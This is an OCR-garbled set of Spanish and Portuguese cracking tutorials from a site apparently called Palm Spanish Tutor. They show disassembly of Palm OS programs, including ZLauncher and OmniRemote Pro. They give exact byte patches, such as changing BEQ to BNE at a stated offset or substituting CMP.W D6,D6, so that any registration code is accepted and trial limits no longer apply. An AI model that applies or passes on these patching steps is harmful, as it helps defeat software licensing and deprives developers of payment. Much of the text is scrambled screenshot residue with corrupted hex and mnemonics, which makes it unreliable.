0000882E 3F 3C 00 02 MOVE.W +$0002, -(A7) 
00008832 48 6E FF D4 PEA.L WVAR_2C 

00008836 48 78 00 03 PEA.L $3 

0000883A 2F 3C 52 46 48.. MOVE.L +$52464832, -(A7) : -> 'RFH2' 
00008840 4E 4F A2 D4 SysTrap PrefSetAppPreferences 
00008844 4F EF 00 10 LEA.L $10(A7), A7 

loc_8848: 

00008848 48 78 00 00 PEA.L $0 

0000884C 48 78 00 00 PEA.L $0 

00008850 41 FA 00 5A LEA.L $5A(PC), AO 

00008854 48 50 PEA.L (AO) 

00008856 3F 3C 07 08 MOVE.W +$0708, —(A7) 
0000885A 4E 4F Al 94 SysTrap FrmCustomAlert 
0000885E 42 67 CLR.W -(A7) 


00008860 4E 4F Al 9E SysTrap FrmReturnToForm 
00008864 4F EF 00 10 LEA.L $10(A7), A7 
00008868 60 1A BRA.S LOC_8884 

loc_886A: 

0000886A 48 78 00 00 PEA.L $0 

0000886E 48 78 00 00 PEA.L $0 

00008872 41 FA 00 68 LEA.L $68(PC), AO 
00008876 48 50 PEA.L (AO) 

00008878 3F 3C 07 08 MOVE.W +$0708, -(A7) 
0000887C 4E 4F Al 94 SysTrap FrmCustomAlert 


Efectivamente cuando cambiamos por un "000084BA BC 46 CMP.W D6, D6" y hacer los 
cambios con un editor hexadecimal y guardarlos, cargamos la aplicación en una palm 
real y al cargar la aplicación ya no aparece la ventana de registro, parece que al ir 
a la ventana del menú de registro, nos aparece que ya estamos registrados, Hacemos la 
aclaración que este programa se limita a solo mostrar los días de fiesta del año 2004 
y si te registras puedes ver los días de fiesta hasta el año 2010, posteriormente 
podemos descargar un archivo *.pdb con el que puedes usar hasta más años. 

Al cambiar la instrucción CMP.W D6, D6 esta limitación se pierde, adelantamos el reloj 
de la Palm todo trabaja bien. 

Alguien se preguntara como llegue hasta aquí y supe que instrucción parchar, pues 
fácil, usando el archivo desensamblado completo y abriéndolo con el Ultraedit32 vl0.a 
Spanish, una ves estando en el archivo desensamblado buscar cadenas como "CMP.W" (Usar 
control+F) se desplegarán muchas instrucciones pero solo nos interesarán las que 
comprueben registros contra registros, Una vez que hic sta búsqueda empece desde la 
ultima instrucción que me mostró el UltraEdit (Editor hexadecimal) fu ntonces qu 
mire esta instrucción sospechosa y decidí cambiarla por la 
mencionada "000084BA BC 46 CMP.W D6, D6", También podemos ir rastreando con 
PalmDebugger para saber por donde andamos, efectivamente observe que se pasaba por 
esta instrucción que parchamos , mucho antes de leer nuestro HotSync/Name. 

Hasta aquí con este tutorial. 


29 de Abril 2005 
By Jaime Maussan 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


()Serial (X)HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 


Descripción: | Permite dar apariencia de Windows XP a la Palm 


Objetivo: | Validar cualquier serial 


Dificultad: |(xX)NewBies ( )Intermedio ()Avanzado ()Master ( )Gúru 


http://www. handango.com 


| Herramientas: | SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 ,PalmDebugger 


INTRODUCCION 


PORTUGUES VERSION: 


Este programa permite a vocé personalizar a área de trabalho do seu palm. 
Registrando qualquer serial: 


Primeiro vamos estudar o comportamento do programa para registrar. 
TRADUCCION DEL PORTUGUES AL ESPAÑOL; 


Este programa nos permite personalizar el área de trabajo de nuestra palm. 
Registrando con cualquier número de serie 


Primero estudiaremos el comportamiento del programa a registrar. 
Este programa permite copiar, pegar, mover,borrar,renombrar archivos desde la palm. Parece 
bueno pero a un precio que casi cualquier mortal no lo puede pagar.Ahh y hasta incluye skins 
para que se paresca a Windows Xp, Mac, Etc. 


Info... 

Trash Bin... 

File Manager... 
Theme WNanager... 


Toggle Item Views 
Toggle Top Bar 
Toggle Bottom Bar 


diDotabase Name id Creator 
6342323 WSerDrwr u8vz 1 
dd LAA addr 
BDE %  addr 
Us % — addr 
"FR addr 
IT %  odd 
addr 
pss 
4K) w All 
e 
MES 


Esto ya promete meter las narices donde no debemos ........... 


AL ATAQUE 


¿Launcher ys 20 
Exild 050329 


Ss Z¿hongzhe Technology Lo., Ltd. 
All right: reserved. 

https dm zzteche cor 
alouncheriaz2techs corr 


- Unregistered Version - 


OK | [ Register How 


Register 
To register and get the full 
version, go to 
ww handango.corm/purchase 
and enter 42086. 


vou have 30 doy: left to try for free 


User Name (Hot$ync 1D) [ HE: ] 
Stanley 


Registration Code 


[ Register ] [ Continue Trial ] 


Digitamos qualquer serial e...: 
Digitamos cualquier serial como...: 


Register 
To register and get the full 
version, go to 


ww handango.corm/purchase 
and enter 42086. 


vou have 30 doy: left to try for free 
User Name (Hot$ync ID) [ HE: ] 
Register foiled 


ES invalid registration 
code! 


Um alerta aparece. Abrimos entáo no PRCExplorer e localizamos o alerta. 


Vemos una alerta, Abrimos nuestro PRCExplorer y localizamos la alerta en: 


ZLauncher - Palm Application Explorer 
File Edit View Help 


=> y q LJ 
=) Talt (79) 
10 
1001 ( 
1002 (0: 


Resource size: 54 bytes 


Register failed 


ES Invalid registration 
code! 


] 0000: 00 03 00 00 00 01 00 00 52 65 67 69 73 79 65 72 ....oo.. Register a 
1) 20 66 61 69 6C 65 64 00 49 6E 76 61 6 69 64 20 failed. Invalid 
(Obb8) 72 65 67 69 73 74 72 61 74 63 6F 6E 20 63 6F 64 registration cod 
bo) y 65 21 00 4F 4B 00 el. 0K A 
ES > o 
Alert (Regis Nicolas <Regis.Nicolas(mPalmSource, com) PUN 


o r = r nm r o > A — 
¡¿ Iniciar O | avayalPS... é WPN Client -... —' Palm OSO ... fr C:Docume... uy zlauncher Y... ZLauncher-... ED RARO 13:32 


Notamos que seu ID é 1002 (0O3ea hex). Abrimos o programa no PRCEdit e localizamos o ID. 


Notamos que su ID es 1002 (0O38ea hexadecimal). Abrimos el programa con PRCEdit y localizamos ese ID en: 


Window Help 


ZLauncher.patched pro | ACP. code0D05.s | coded003.s | code0004.s | code0001.s | code0002.s | code0007.s | code0006.s | code0008.s 


Ye Resources 4638 392: q4e4fals50 sayaTrapFrmGertObjectindex A 
+ $3] Forma 31 000 3500 MOVE.W  DO,D 5d 

E Ey alerts dono: a 31049 MOVE.  D4, 

e EY Strino 000 2f0a MOVE.L  A2,- 

+ 23 Datal 000 4 4e4fals3 sysTrapFrmGe 

+2-£3 dc.b Dona 5 2645 MOVEA.L 40,43 

43 Keywords ú a 3104 MOVE.W  D4,-(147 


¿fa MOVE.L  242,-(247) 
q4e4fal79 sysaTrapFrmsetFocus 

¿tOb MOVE.L  243,-(47) = 
4e4fal39 aysTrapF ldcetTextPtr 

2445 MOVEA.L 20,242 


sl E al 


( 


1:92:09 :20 030 99. 2:00 10 010 AR O O A O A a 


4788 MOVE.L  242,-(47) 
o deadíióla JSR -2550 145) 
' 400 TST.B DO 


J 


q4fefóODla LEA 26(47),A7? 
6740 EEG L445 
¿Dó6dceD6 MOVEA.L -12794145),40 
10bc0001 MOVE.B  H1,(1401 
CLR.L D 
MOVE. L 
PEA 
sayaTrapotrCcopy 
MOVE.B $1,-1(147) 
MOVE.  f$28!'$1c,-(147) 
MOVE.L -12794(45),- (47) 
MOVE.L fH16646145'$fe0001, 
MOVE.L  fH1514947410'$5a4c4 
saysaTrapPrefSetippPreferences 
MOVE.W  F1001!'$3e29,- (147) 
al92 sysaTrapFrmilert 


£ 


dl E 


uy 
Ho 


H 


SN 
H 


H 


oO (í 
A SS 
H mM 
ra] 


Hu 
10 
Hp 0 
H 


[ q4fefóbDla LEA 26147] ,47 

D 60Z2e ERA L445 

D 33 L445 MOVE.  F1002!$3ea,- (147) ; Register failed 
0 4e4 sysTrapFrmilert 


Of 
--] 
Ti 


MOVEO H1,D3 
ADDO.W  H2,A47 
ERA L445 
azdcebDla L446 TST.B -12 790115) 


in 
Hu 
Hu 


mL 


E 
€ 


[A 
Y 


String: € Ln 4663, Col 20 


(N [;f Avaya IPS... E lent -... —T Palm a% :|Docume.... y Zlauncher Y... Preedit ir : 
E O | avayalPS YPN Client Palm OSO 5 CD ay Zlaunch d RIOROD 13:33 


Transpomos o código e analisamos: 
Copiemos el código y analicémoslo: 


0000392a 4e4fal80 
0000392e 3800 
00003930 3f04 
00003932 2f0a 
00003934 de4fal83 
00003938 2648 
0000393a 3f04 
0000393c 2f0a 
0000393e delfal79 
00003942 2f0b 
00003944 delfal39 
00003948 2448 
000039%a 2f0a 
0000394c deadf60a 
00003950 4a00 
00003952 4fef00la 
00003956 6740 
00003958 206dce06 
0000395c 105c0001 
00003960 42280002 
00003964 2f0a 
00003966 48680006 
0000396a de4fa0c5 
0000396e 1f£f3c0001 
00003972 3f3c001c 
00003976 2f2dce06 
0000397a 2f3c00fe0001 
00003980 2f3c5a4c4352 
00003986 4delfa2d4 
0000398a 3f3c03e9 
0000398e 4delfal92 
00003992 4fef00la 
00003996 602e 
00003998 3f3c03ea 1445 
0000399c 4delfal92 
000039a0 7601 
000039a2 544f 
000039a4 6020 
000039a6 4a2dce0a L446 


O alerta do registro inválido está na linha 00003998 e tem um label 1445. Perguntamos: 
A resposta está na linha 00003956 (BEQ L445), entáo basta alterar BEQ para BNE, assim: 


sys 
MO 


sys 
MOV: 


sys 
MOV: 
sys 
MOV: 


JSR 
TST 
LEA 
BEQ 


sys 
MOV: 


MOV 


sys 
MOV: 
ADD 
BRA 
TST 


MOV. 
MOV. 


MOV: 
MOV. 


TrapFrmGetObject Index 
VE.W DO,D4 

E.W D4,-(A7) 

E.L A2,-(A7) 
TrapFrmGetObjectPtr 
EA.L AO, A3 

E.W D4,-(A7) 

E.L A2,-(A7) 
TrapFrmSetFocus 

E.L A3,-(A7) 
TrapFldGetTextPtr 
EA.L A0,A2 


4 tr 


MOVE.L A2,-(A7) 


-2550(A5) 
.B DO 
26(A7),A7 
L445 
EA.L -12794(A5),A0 
E.B +1, (A0) 
.L 2(A0) 
E.L A2,-(A7) 
6(A0) 
TrapStrCopy 
E.B +1,-(A7) 
E.W +428!$1c,-(A7) 
E.L -12794(A5),-(A7) 
E.L $16646145!$fe0001,- (A7) 
E.L +1514947410!$5a4c4352,-(A7) 
TrapPrefSetAppPreferences 
E.wW +f1001!$389,-(A7) ; Register success 
TrapFrmAlert 
26(A7),A7 
L448 
E.W $1002!$3ea,-(A7) ; 
TrapFrmAlert 
EQ +1,D3 
Q.W +42,A7 
L448 
-12790(A5) 


Register failed 


«E: 


La alerta del registro invalido está en la linea 00003998 en el label 1445. 
Nos preguntamos a donde ocurre el salto hacia la L445? 


Una respuest está en la linea 00003956 


(BEO L445), 


Onde ocorre o desvio para 1445? 


Entonces solo basta con que cambiemos el BEQ por BNE Así: 


Prcedit - [code0005.s] 


$ File Edit view Tools 


E Resources 
23 Forms 
23 Alerts 
23 Strinos 
23 Data 0 
23 dc.b 

93 Keywords 
23 Changes 


¡4 Iniciar 


23 Search Results 


window Help 


ZLauncher. patched. pre 


4633 
4634 
4635 
4636 
4637 
46383 
4639 
4640 
4641 
4642 
4643 
4644 
4645 
4646 
4647 
4648 
4649 
4650 
4651 
4652 
4653 
4654 
4655 
4656 
4657 
4658 
4659 
4660 
4661 
4662 
4663 
4664 
4665 
4666 
4667 
4668 
4669 
4670 
4671 


00003932 
00003934 
00003938 
D0000393a 
00003930 
0000393e 
00003942 
00003944 
00003948 
000039%a 
0000394c 
00003950 
00003952 
00003956 
00003958 
00003950 
00003960 
00003964 
00003966 
0000396a 
0000396e 
00003972 
00003976 
0000397a 
00003980 
00003986 
00003958a 
00003958e 
00003992 
00003996 
00003998 
00003990 
D000039abD 
D000039a2 
00003924 
D00039a6 
DO00039aa 
000039ac 


0000390 


RCP 


2fDa 
4e4falo3 
2648 
3f04 
2fDa 
4e4fal7?9 
2f0b 
4e4fal39 
2445 
2f0a 
4eadfóDa 
4a00 
4fef00la 
lezan 


Y) Jump to address: 00003956 

1 pto hea tE ava É 

9 Jumpto link: L445 (00003998) F10 

2 mp with RTS to: <not availible> F11 

3 mot a 

43 

1 2.” ná A 
3 a 
2 Save file as... Ctri+s 

7 Set jump destination 


3f3c03e9 
4e4fal92 
4fefO00la 
602e 
3f3icO3ea 
4e4fal92 
7601 
544f 
6020 
24aldceDa 
6715 
437580000 
45780000 


L445 


L446 


Ln 4646, Col 12 | 
6/0 1 AvayalPS... 


é VPN Client -... — Palm OSO ... Mr C:Docume... 


codeD005.s | code0003.s | code0004.s | code0001.s | coded002.s | code0007.s | code0006.s | code0008.s 


MOVE.L 42,-(A7) A 

sysTrapFrmGetObjectPtr ñ 

MOVEA.L A0,A3 

MOVE.W  D4,-(A7) 

MOVE.L 42,-(47) 

sysTrapFrmSetFocus 

MOVE.L  A3,-(47) 

sysTrapF ldGetTextPtr 

MOVEA.L 40,142 

MOVE.L 42,-(A7) y 

JSR -2550(145) 

TST.B DO 

LEA 26(47),147 

BEQ L445 

MOVEA.L -12794(45),40 

MOVE.B f1, (40) 

CLR.L 2 (240) 

MOVE.L 42,-(A7) 

PEA 6(140) 

sysTrap3trCopy 

MOVE.B H1,-(47) 

MOVE.  Ff28!'$1c,-(47) 

MOVE.L -12794(A5),-(47) 

MOVE.L Ff16646145!'$fe0001,-(47) 

MOVE.L fFf1514947410!'$5a4c4352,-(47) 

sysTrapPrefSetippPreferences 

MOVE. Ff1001!$3e9,-(47) ; Register success 

sysTrapFrmilert 

LEA 26/(47),147 

BRA L4485 

MOVE. F1002!$3ea,-(47) ; Register failed 

sysTrapFrmilert 

MOVEO $1,D3 

ADDO.W H2,A7 

BRA L445 

TST.B -12790(145) 

BEQ L447 

PEA $0000.1 

PEA $0000.1 % 
> 


Y Zlauncher v... Preedit 


o RIOR 13:38 


Prcedit - [C:WDocuments and Settings1f9197911Weus documentosWocumentos do StanleyWDownloadsipalmiFilesWl auncher. patched.prc] 


$ File Edit Insert View Tools Window Help -50xX 
From assembler atched.pre | ACP | code0005.s | coded003.s | code0004.s | code0001.s] code0002.s | code0007.s | coded006.s | code000s s | 
60 (BRA) 6768 4486 6622 2F04 2FDA 4EAD EFE6 504F ghJIf"/./.N-iePO A 
3FOO 2F2D CDOE 4EAD F892 584F 2F08 4EAD ?./-Í.N-a”X0/.N- 
67 (BEQ) EDBE 2648 5C4F 6026 2F04 4EAD F148 2608 ¡W%8HM0' £/ .N-RH£. - 
4848 (TRAP into debugger) 584F 6718 2F03 2F2D CDOE 4EAD F862 2648 X0Og././-Í.N-absH E 
4E71 (NOP) 2F03 4E4F A012 4FEF 000€ 6002 97CB 7601 “/.NO .01i..' .IEv. 
7000 (MoveQ FO, DO) 6018 4864 O00E 3F2F OD00A 3F2F 000A 4EAD '.Hj..?4..?/..N- 
JOA LP L00) FS3E 4A00 504F 6602 7601 4A03 6700 FDBO 5>J.POf.v.J.g.y* 
aa sóan 1870 0001 (909 3F3C 8000 4E4F A175 3F00 .|..ÉÉ?<1.NO¡u?. 
Mi pueda. k 4E4F A19D 584F 200€ 6714 3F3C 0001 2F0C NO¡IXO .g.?<..7. 
Manage. 2057 2268 O00A 2269 0008 4E91 504F 204B_— W"h.."i..N“M0 K 


4FEF 0018 4CDF 5CFO 4E75 2F04 2F03 4227 01..LfsaNu/./.B' 
41FA 0046 4550 4267 2F3C 6170 706€ 2F3C Aú.FHPEg“<appl/< 
5A4C 4352 4EAD EBFO 25800 4FEF 0010 671€. ZLCRN-e3(.01..y. 
4247 4267 2F04 4267 4E4F ADA? 3600 4FEF ESEgY.BgNO S6.01 
000€ 660€ 187€ 0001 C9CA 6004 3630 0207 ..f..]..ÉÉ .6<.. 
3003 261F 281F 4E75 5440 6175 6E63 6865 0.S%.(.NuzLaunche 
7200 48E7 1830 246F 0014 7600 0C52 0009 r.Hc.OfSo0..v..R.. 
6600 D0CO 3024 0008 0440 0515 670€ 0440 f£..Á0*...0..g..0 
0DOC 6700 O0SÉ 6000 O0AA 4E4F A173 2448 ..g..I' ..2N0is$5H 
3F3C 0517 2FDA 4E4F A150 3800 3F04 2F0A  ?<../.N0¡18.?./. 
4E4F A1053 2648 3F04 2FDA 4E4F A179 2FO0B NO¡I£H?./.NO0¡y/. 
4E4F A139 2445 2FOA 4EAD F60A 4400 4FEF NO¡95H.N-0.J.01 
0014 B740 206D CE06 10BC 0001 4248 0002 0 ml..4..B".. 
2FOA 4868 0006 4E4F AOCS 1F3C 0001 3F3C .Hh..NO Á.<..?< 
0010 2F2D CEO06 2F3C DOOFE 0001 2F3C 5A4C ../-1./<.p../<ZL 
4352 4E4F A2D4 3F3C 03E9 4E4F A192 4FEF CRNOG07<.éNOi¡ “Oi 
0014 602E 3F3C O3EA 4E4F A192 7601 544F ..' .?<.éN0i”v.TO 
6020 4A42D CEOA 6718 4878 0000 4878 0000 * J-1.g9.Hx..Hx.. 
486D CEOA 3F3C O3EB 4E4F A194 4FEF 000E HmÍ.?<.éN0i¡10i.. 
7601 1003 4CDF 0C18 4E75 48E7 1034 4FEF v...LB..NuHc.:01 
: FFCA 426F 0034 42AD CE06 99CC 4878 0010 yÉBo.4B-Í1.11Hx.. 
4E4F A013 2B48 CEO06 584F 6604 3F7C 0102 NO .+HÍ.XOf.?]|.. 
0034 6000 0164 2F2D CEO6 4EBA 01AC 4878 .4' ..j/-1.N2.-Hx 
0000 4878 0000 466F D00C 4678 0000 4878 ..Hx..Ho..Hx..Hx 


0000 4878 0000 4E4F A249 3F40 0050 4FEF  ..Hx..NO(070.POi 
anif ARNA 4417 AANR 2AF2M NAF” AFAF 210? £O OTE e iNmi? 


- [Pos: 4892h,18578. 


IES 


Resource: ; code.0005 


¿Iniciar S 60 Uf avayalPS... e VPN Client -... 


Palm OB ... 5 C:iDocume... Y Zlauncher v... Prcedit ET RS y 13:38 


Prcedit - [C:Wocuments and Settings1f9197911Weus documentosWocumentos do StanleyWDownloadsipalmiFilesWl auncher.patched.prc] 
PP File Edit Insert View Tools Window Help -50X 


ZLauncher.patched.pre | ACP. | code0005.s | coded003.s | code0004.s | code0001.s | code0002.s | code0007.s | codeD006.s | code000s s | 


: 6768 4406 6622 2F04 2FOA 4EAD ghJIf£"/./.N-12PO 
0x04740: 3F00 2F2D CDOE 4EAD F892 584F 2F08 4EAD ?./-Í.N-a*X0/.N- 


E Resources 


+23 Forms 
a < Alerts 0x04750: EDBE 2648 504F 6026 2F04 4EAD F148 2608  ¡%eHs0' £/ .N-ñH£. = 
1-3 Strings 0x04760: 584F 6718 2F03 2F2D CDOE 4EAD F862 2648 XOg././-Í.N-absH 3 
ES pe 0x04770: 2F03 4E4F A012 4FEF 000€ 6002 97CB 7601 /.NO .0i..' .IEv. 
E Sa sorda 0x04780: 6018 4864 OO0E 3F2F 0004 3F2F 000A 4EAD *.Hj..?/..?/..N- 

23 Changes 0x04790: FS3E 4400 504F 6602 7601 4403 6700 FDBO 5>J.POf.v.J.g.y* 


0x047A0: 1870 0001 C9C9 3F3C 8000 4E4F A175 3F00 ./..ÉE?<1.NOiu?. 
0x047B0: 4E4F A19D 5564F 200€ 6714 3F3€ 0001 2FO0C.” NO¡IXO .9.?<..7. 
0x047C0: 2057 2268 D00A 2269 0008 4E91 5C4F 204B — W"h.."1..N%50 K 
0x047D0: 4FEF 0018 4CDF 5CF8 4E75 2F04 2F03 4227 01..LfBraNu/./.B' 
0x047E0: 41FA 0046 4650 4267 2F3C 6170 706€ 2F3C. Aú.FHPEg“<appl4< 
OxD47F0: 544€ 4352 4EAD EBFO 2500 4FEF 0010 671€  ZLCRN-e$5(.01..g3. 
0x04600: 4247 4267 2F04 4267 4E4F ADA? 3600 4FEF BSBg“.BgNO $6.01 
0x04810: 000€ 660€ 187€ 0001 C9CA 6004 3630 0207 ..f..]..ÉÉ .6<.. 
0x04820: 3003 261F 2581F 4E75 5440 6175 6E63 6865 D.£.(.NuZLaunche 
0x04630: 7200 48E7 1630 246F 0014 7600 0C52 0009 r.Hc.Dfo..v..R.. 
0x04840: 6600 00CO 3024 0008 0440 0515 670€ 0440 f..AÁ0*...0..g..0 
0x04850: O00C 6700 O08É 6000 00AA 4E4F A173 2448  ..g..I' ..2N0is5H 
0x04860: 3F3C€ 0517 2F0A 4E4F A180 3500 3F04 2F0A  ?<../.N0¡18.?.7. 
0x04870: 4E4F A163 2645 3F04 2F0A 4E4F A179 2FOB NO¡IS5H?./.NO0i¡y14. 
0x04850: 4E4F A139 2445 2FDA 4EAD F60A 4400 4FEF NO¡95H.N-0.J.01 


2 


0x04890: 0014 6640 206D CEO06 10BC 0001 4248 0002  ..f0 ml..4..B”.. 
0x048A0: 2F0A 4868 0006 4E4F AOCS 1F3C 0001 3F3C /.Hh..NO Á.<..?< 
0x048B0: 0010 2F2D CEO6 2F3C OOFE 0001 2F3C 5A4C  ../-1./<.p../<ZL 
0x048C0: 4352 4E4F A2D4 3F3C 03E9 4E4F A192 4FEF CRNOGÓ?<.éNOi “Oi 
0x0468D0: 0014 602E 3F3C OSEA 4E4F A192 7601 544F  ..' .?<.éN0i”w.TO 
0x048E0: 6020 442D CEOA 6718 4878 0000 4878 0000 * J-Í.g.Hx..Hx.. 
0x048F0: 486D CEOA 3F3C O3EB 4E4F A194 4FEF 000E HmÍi.?<.éN0i¡10i.. 
0x04900: 7601 1003 4CDF 0C1l8 4E75 408E7 1C03A 4FEF. v...LB..NuHc.:01 
0x04910: FFCA 426F 0034 42AD CE06 99CC 4878 0010 yÉBo.4B-Í1.11Hx.. 
0x04920: 4E4F A013 2B48 CED6 584F 6604 3F7C 0102 NO .+HÍ.XOf.?].. 
0x04930: 0034 6000 0164 2F2D CEO06 4EBA D1AC 4878 .4' ..j/-1.N2.Hx 
0x04940: 0000 46878 0000 486F ODOC 4678 0000 4678  ..Hx..Ho..Hx..Hx 


0x04950: 0000 4878 0000 4E4F A2A49 3F40 0050 4FEF  ..Hx..NO(0?0.POi 
NYN4QAN: NNÑAN ARMA 4a17 AANF 23F20 MAFM AFAF a4102 £O OTE e iNmi? 


- [Pos: 4892h,18578. 


23 Search Results 


IES 


Resource: ; code.0005 


¿Iniciar S 60 Uf avayalPS... e VPN Client -... 


Palm OB ... 5 C:iDocume... Y Zlauncher v... Prcedit ET RS y 13:38 


Alteracáo destacada em amarelo (0x04890: 001A 66). Salve o programa, facga o HotSync dele e pronto. O Zlauncher agora aceita qualquer 
registro. 


Los Bites cambiados están en la linea (0x04890: 001A 66) en la parte amarilla ,Guardemos los cambios y conectemos el hotsync y demosle 
sincronizar y listo el programa valida cualquier registro. 


Al introducir cualquier serial nos aparece, 


Register 
To register and get the full 
version, go to 
www.handango.corm/purchase 
and enter 42086. 
You have 30 doys left to try for free 
User Narne (Hot Sync ID) [HE] 


Register success 


(3) Thank you for your 
5 registration. 


Y adelantando el reloj 10 años parece que todo trabaja bien 
Afer Ventus 
Brasil 


Post _nubilalyahoo.com.br 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


()Serial ()HotSync/Code ()Trial (X)Multiprotección ()Encriptado (X)Otro 
Programa que usa el infrarrojo como control universal para TV,VRC, DVD,CD, Cable 


()NewBies ()Intermedio ()Avanzado ()Master ( )Gúru 
http://www. pacificneotek. com 


| Herramientas: | SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 PalmDebugger 


INTRODUCCION 


GrmniRermote Pro | "0D 


Amrikemote 
version 2.14 


Charlie Payne 
Pacific Neo-Tek, Inc. 


https cnn pacificneotek. corn 


FIG. 1 


AL ATAQUE 


Esse programa transforma seu Palm em um controle remoto para diversos tipos de aparelho. 
Como patchear: 
1 - Descobrindo a chave de registro 


OmniRemote Pro de Ls CTA 


Power] emm a —— 
[Display] [Repeat] 


Registration 


(1) This program is 


untegistered. You have 
15 days remaining. 


[OK ][ Register | 


FIG. 2 


CrmniRemóte Pro “UD 


A | 
| Registration 


To obtain a registration code, 
Malta pacificneotek. corn 


our Palra Lsernarme is: 


Registration code: 


| [| Reghid |] 


O sistema de registro usa o HotSync Name para gerar a chave correspondente. Vamos digitar qualquer coisa e ver seu 
comportamento. 


CramBermte Pro 2 CD 


3 E Arnp 
Displaw [Repeot | 


Registration failed! 


| Power] En WOR Í | | 
abi 


The registration code 
you entered was 


incorrect for your 
username. 


FIG. 4 


Digitei 12345678 (a chave digitada deve conter no mínimo 8 caracteres -> letras e/ou números) e O alerta acima 
aparece. 


Vamos localizar esse alerta usando o PRCExplorer. 


Remote - Palm Application Explorer 


File Edit View» 


> 


Help 


q LJ 


AjEJEs 


=) Talt (74) 
1000 (Ds 
1100 ( 
1200 ( 
1300 ( 
1400 ( 
1500 ( 


160 
1700 
1500 
1900 


Alert (Regis Nicolas < 


3 Iniciar 


0b54) 
Obbs) 


1004) 
1068) 
10cc) 
1130) 
1194) 


Resource size: 99 br 


ptes File offset 0x3874E [231246] 


Registration failed! 


0000: 00 02 00 
0010: 74 69 6F 
0020: 20 72 65 


0030: 64 65 20 


The registration code 
vou entered was 
incorrect for your 
username. 


00-00 01 00 00 52 65 67 69 73 74 72 6l  ........ Registra 
GE 20 66 61 69 60 65 64 21 00 54 68 65 tion failed!.The 
67 69 73 74 72 61 74 69 6F 6E 20 63 6F registration co 


79 6F 75 20 65 6E 74 65 72 65 64 20 77 de you entered y 


(2 


MM 


EJIG:. 59 


Identificamos seu ID como 1500 (O05dc Hex). Agora procuramos ele no PRCEdit. 


Prcedit - [code0003.s] 
e File Edit View Tools Window Help -0X 


dla aa REP | codeD0001.s | code0002.s  codebD03.s 


ANAAA 371825 
$37!1$25,- (14 


3f3c00 MOVE. U 
000454 600a ERA L32 
000456 2000 MOVE.L  DO,DO 
0004838 2000 MOVE.L  DO,DO 
00043a 2000 MOVE.L  DO,DO 
L 
L 


Resources 


£l Stinós 
23 Data 0 
Y de.b 

23 Keywords 
93 Changes 
23 Search Results 


000480 2000 MOVE. DO,DO 

00043e ¿000 MOVE. DO, DO 

0004390 deadfe5c L32 JS3R -920115) 
0004394 1b?cob0ielid MOVE.EB  f1,-79071(15) 
00049a 500a ERA L33 

000490 2000 MOVE. DO, DO 

00049%e ¿2000 MOVE. DO, DO 


L 
L 
0004a0 2000 MOVE.L  DO,DO 
L 
L 


E-4-E-E-E-5-38% 


0004a2 2000 MOVE . DO, DO 

0004a4 2000 MOVE. DO, DO 

0004a6 dead L33 JSR 60145) 

000%aa ALIÍC MOVE. f6300!$189c,-[47) ; Pro features upgrad 

0004%a 4e ¿ sysTrapFrmilert 

0004b2 q4fefo00e LEA 194147) ,47 

0004h6 6o00o00ofe ERA L48 

0004ha ¿f0a L34 MOVE.L  242,-(247] 

0004bc de“dfabDc”7 sysTrapStrLen 

00040 0c40000s CMPI.V. f5,DO 

000404 584f ADDO.W  f4,147 

000406 6414 ECC L35 

0004c8 ¿Ob MOVE.L  243,-(247] 

0004ca q4e“fal7?0O sysaTrapFrmbeleteForr 

00D04ce 3f3co9ca MOVE.  F2500!$9c4,-(17) ; Short registration € 

000442 4e4fal92 aysTrapFrmilert 

000446 504f ADDO.W 6,147 

0004ds BRA L43 

0004dc MOVE.L  42,-(47)] 

0004de MOVE. -—-?E3S51145),- 147) 

0004e2 sysTrap $4515 = Unknown System Trap 

0004e6 CMP. VW -322 ¿DO 

0004ea ADDO.W  F6,1 

0004ec ENE L42 

0004e MOVE. ESE! sS5dc,—- (147) ; Registre 

Doo q: sysaTrapFrmilert No 
> 


00004tf2 
String: Ln 412, Col 50 | 


un] 
Hb 


h 
H 


IO 10 


+ 

H 

c 
Op 


19:90:90: 190.0"9-2:92/2.92:0:0:10 990039 2 .0.2,9.2-00 0-9 0922 9080/92:3.2:, 


E 
rá) 
tn 


L 


ES 
3 O 
Doo y 


H 
a 


ES 
- 
m 
O 


te 
pur 
. 
O 


q 
pur 
mo 
O 
m0 
a 
= 
A 
p 
m7 
e 
p- 
ru 
M 
a 


+ 
» 
a 
O 


[A 


Iniciar 


¿3 Iniciar OO lav. AY. CN SO... Eo. D ¿Pro uliPa... mM SO) QIOJO y) = ARDE 10:02 


FIG. 6 
Abrimos o Remote.PRC e teclamos Ctrl1+F. Digitamos 1500 e ele encontra no código a chamada do alerta que diz que foi 
digitada uma chave inválida. Vamos transpor o código para entendermos o fluxo: 


00000480 3£3c0025 MOVE.W  +437!$25,-(A7) 

00000484 600a BRA 132 

00000486 2000 MOVE.L  DO0O,DO 

00000488 2000 MOVE.L  DO,DO 

0000048a 2000 MOVE.L DO,DO 

0000048c 2000 MOVE.L  DO0O,DO 

0000048e 2000 MOVE.L  DO0O,DO 

00000490 4eadfe5c L32 JSR -420(A5) 

00000494 1b7c0001el1ld MOVE.B  +$1,-7907(A5) 

0000049a 600a BRA 133 

0000049c 2000 MOVE.L DO0O,DO 

0000049e 2000 MOVE.L  DO,DO 

000004a0 2000 MOVE.L  DO0O,DO 

000004a2 2000 MOVE.L  DO0O,DO 

00000%4a4 2000 MOVE.L  DO0O,DO 

00000%4a6 4eadffc4 L33 JSR -60(A5) 

00000laa 3f3c189c MOVE.W  +6300!$189c,-(A7) ; Pro features upgrade 
00000lae 4e4fal92 sysTrapFrmAlert 

000004b2 4fef000e LEA 14(A7),A7 

000004b6 600000fc BRA 148 

000004ba 2f0a L34 MOVE.L A2,-(A7) 

000004bc 4e4fa0c7 sysTrapStrLen 

000004c0 0c400008 CMPI.W  +8,DO 

000004c4 584f ADDO.W  +44,A7 

000004c6 6414 Bcc L35 

000004c8 2f0b MOVE.L  A3,-(A7) 

000004ca 4e4fal70 sysTrapFrmDeleteForm 

000004ce 3£3c09c4 MOVE.W  +2500!$9c4,-(A7) ; Short registration code 
